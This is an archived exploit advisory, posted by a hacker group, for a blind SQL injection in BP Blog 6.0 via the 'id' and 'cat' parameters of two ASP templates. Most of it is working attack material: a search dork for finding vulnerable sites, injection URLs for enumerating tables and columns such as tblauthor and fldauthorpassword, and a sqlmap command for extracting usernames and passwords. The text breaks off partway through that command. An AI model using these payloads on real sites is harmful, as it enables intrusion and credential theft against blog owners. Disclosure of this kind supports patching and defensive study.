TUCoPS :: Web :: Blogs :: bx3376.htm

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability
BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability
BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability



BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability=0D
=0D
JosS, Jose Luis G=F3ngora Fern=E1ndez=0D
Spanish Hackers Team=0D
www.spanish-hackers.com=0D 
=0D
[+] Info:=0D
=0D
[~] Software: bp blog=0D
[~] HomePage: http://blog.betaparticle.com/=0D 
[~] Exploit: Blind SQL Injection [High]=0D
[~] Vuln file: template_permalink.asp=0D
[~] Vuln file2: template_archives_cat.asp=0D
=0D
[~] template_permalink.asp?id=[blind]=0D
[~] template_archives_cat.asp?cat=[blind]=0D
=0D
[~] Bug found by JosS=0D
[~] Contact: sys-project[at]hotmail.com=0D
[~] Web: http://www.spanish-hackers.com=0D 
[~] EspSeC & Hack0wn!.=0D
=0D
[~] Dork: "Powered by bp blog 6.0"=0D
=0D
=0D
[+] Compression:=0D
=0D
[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1=0D 
[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2=0D 
=0D
[+] Exploding:=0D
=0D
[*] Checking table: =0D
=0D
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0=0D 
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])=0D 
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0=0D 
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)=0D 
[~] If you don't see any error, it is that table exist.=0D
=0D
[*] Checking columns number of table:=0D
=0D
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]=0D 
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) = 1=0D 
[~] If you don't see any error, the table has 1 columns.=0D
=0D
[*] Checking columns of table:=0D
=0D
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0=0D 
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorpassword) FROM tblauthor) >= 0=0D 
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorusername) FROM tblauthor) >= 0=0D 
[~] If you don't see any error, the column exists.=0D
=0D
[*] User and password:=0D
=0D
[~] Exploit: ./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1 --string "text" -e "sql query"=0D
[~] Example: ./sqlmap.py -u "http://../template_permalink.asp?id=78" -p id -a "./txt/user-agents.txt" -v1 --string "bp blog" -e "